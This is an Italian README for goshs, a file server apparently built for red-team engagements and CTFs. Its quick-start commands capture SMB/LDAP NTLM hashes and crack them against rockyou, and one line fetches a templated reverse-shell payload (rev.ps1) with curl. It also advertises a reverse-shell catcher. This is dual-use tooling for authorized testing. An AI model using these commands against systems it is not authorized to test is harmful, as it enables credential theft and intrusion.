
goshs v2.1.5
Server di file binario singolo ricco di funzionalità per red teamer e sviluppatori. HTTP/S · WebDAV · FTP/SFTP · SMB · LDAP/S · Cattura di hash NTLM · Callback DNS/SMTP · TLS · Autenticazione · Condivisione di collegamenti. Un potente sostituto di python3 -m http.server.
Sei nel bel mezzo di un engagement. Devi trasferire un file, catturare un hash SMB o avviare rapidamente un server HTTPS — e python3 -m http.server non basta.
goshs è un file server a binario singolo progettato per i momenti in cui ti serve qualcosa di più del SimpleHTTPServer di Python ma non vuoi configurare Apache. HTTP/S, WebDAV, FTP/SFTP, SMB, LDAP/S, autenticazione di base, link di condivisione, callback DNS/SMTP, cattura e cracking di hash NTLM — tutto da un unico comando.


Demo
Provalo tu stesso: demo.goshs.de

Avvio Rapido
# Serve la directory corrente sulla porta 8000
goshs
# Serve con HTTPS (self-signed) e autenticazione di base
goshs -s -ss -b user:password
# Cattura hash SMB
goshs -smb -smb-domain CORP
# Cattura credenziali LDAP e hash NTLM (con cracking opzionale tramite wordlist)
goshs -ldap
goshs -ldap -ldap-wordlist /usr/share/wordlists/rockyou.txt
# Cattura callback DNS e ricevi email
goshs -dns -dns-ip 1.2.3.4 -smtp -smtp-domain your-domain.com
# Auto-distruzione dopo 2 ore
goshs --ttl 2h
# Esegui con la dashboard interattiva da terminale (ottima per sessioni SSH headless)
goshs --tui
# Serve payload che compilano automaticamente host/porta di callback al momento del download
goshs -i 10.10.14.7 --template --tpl-var LPORT=4444
# recupera il payload renderizzato: curl 'http://10.10.14.7:8000/rev.ps1?tpl'
Documentazione
Per una documentazione dettagliata vai su docs.goshs.de
Funzionalità
| 📁 Operazioni sui file | Download (riprendibile e ricercabile tramite HTTP Range), upload (drag & drop, POST/PUT), eliminazione, ZIP in blocco, codici QR |
| 🔌 Protocolli | HTTP/S, WebDAV, FTP/SFTP, SMB, LDAP/S |
| 🔒 Autenticazione e sicurezza | Autenticazione di base, autenticazione tramite certificato, TLS (self-signed, Let's Encrypt, certificato personalizzato), whitelist IP, ACL basate su file |
| ⚙️ Modalità server | Solo lettura, solo upload, no-eliminazione, silenzioso, invisibile, esecuzione comandi CLI, auto-distruzione TTL |
| 🔗 Link di condivisione | Condivisione basata su token, limite di download, limite di tempo |
| 🎯 Collaborazione / CTF | Chat di squadra live (markdown, emoji + autosuggestione :shortcodes:, incolla immagini, upload file, reazioni, modifica messaggi, persistenza su disco opzionale — condivisa tra web ↔ TUI), server DNS, server SMTP, cattura hash SMB NTLM + cracking, cattura credenziali LDAP + cracking hash NTLM (modalità JNDI per Log4Shell), endpoint di redirect, Rev Shell Catcher + generatore di payload |
| 🧩 Templating dei payload | Renderizza {{.LHOST}}/{{.LPORT}} + valori personalizzati --tpl-var nei file serviti su richiesta (?tpl) |
| 🔔 Integrazione | Webhook, tunnel tramite localhost.run, file di configurazione, API JSON, mDNS |
| 🖥️ Dashboard TUI | Dashboard interattiva da terminale a schermo intero; pannelli live per HTTP, DNS, SMB, LDAP, SMTP, reverse shell e chat di squadra; collega e aggiorna shell dal terminale |
| 🛠️ Varie | Tema scuro/chiaro, chat di squadra, auto-aggiornamento, output di log, incorpora file, riduci privilegi |
Installazione
| Metodo | |
|---|---|
| 🐧 curl | sh | curl -sSfL https://goshs.de/install.sh | sh |
| 🦫 Go | go install goshs.de/goshs/v2@latest |
| 🐉 Kali e Parrot OS | sudo apt install goshs |
| 🎗️ Arch Linux (AUR) | yay -S goshs-bin |
| 🖤 BlackArch | pacman -S goshs |
| 🏔️ Alpine Linux (edge) | apk add goshs |
| 🫙 Snap | snap install goshs |
| 🎩 Fedora / RHEL (COPR) | dnf copr enable goshs-labs/goshs && dnf install goshs |
| 🦎 openSUSE | sudo zypper install goshs |
| ❄️ Nix / NixOS | nix-env -iA nixpkgs.goshs |
| 🍺 Homebrew | brew install goshs |
| 🪟 Scoop | scoop bucket add extras && scoop install extras/goshs |
| 🪟 winget | winget install GoshsLabs.Goshs |
| 🍫 Chocolatey | choco install goshs |
| 🐳 Docker | docker run --rm -it -p 8000:8000 -v "$PWD:/pwd" goshs-labs/goshs:latest -d /pwd |
| 📦 Release | Scarica da GitHub Releases |
🐚 Completamento shell
goshs può installare il completamento con tab per bash, fish e zsh:
goshs --completion bash
goshs --completion fish
goshs --completion zsh
Su macOS con Homebrew viene utilizzato automaticamente il percorso Homebrew corretto. Dopo l'installazione, il comando stampa un'istruzione di attivazione esatta, ad esempio:
source ~/.local/share/bash-completion/completions/goshs
🔧 Compila da te
Le risorse web incluse sono già committate, quindi una semplice compilazione funziona:
git clone https://github.com/goshs-labs/goshs.git
cd goshs
go build -o goshs .
Se modifichi le sorgenti JavaScript o SCSS, ricompila prima le risorse con esbuild e sass installati:
make generate
go build -o goshs .
Contributori al codice
Contributori alla sicurezza
Questi sono gli fantastici contributori che hanno reso goshs ancora più sicuro ❤️
Community
Unisciti alla community Discord e inizia a connetterti.
Cronologia Stelle
Crediti
Un ringraziamento speciale va a sc0tfree per aver ispirato questo progetto con il suo progetto updog scritto in Python.















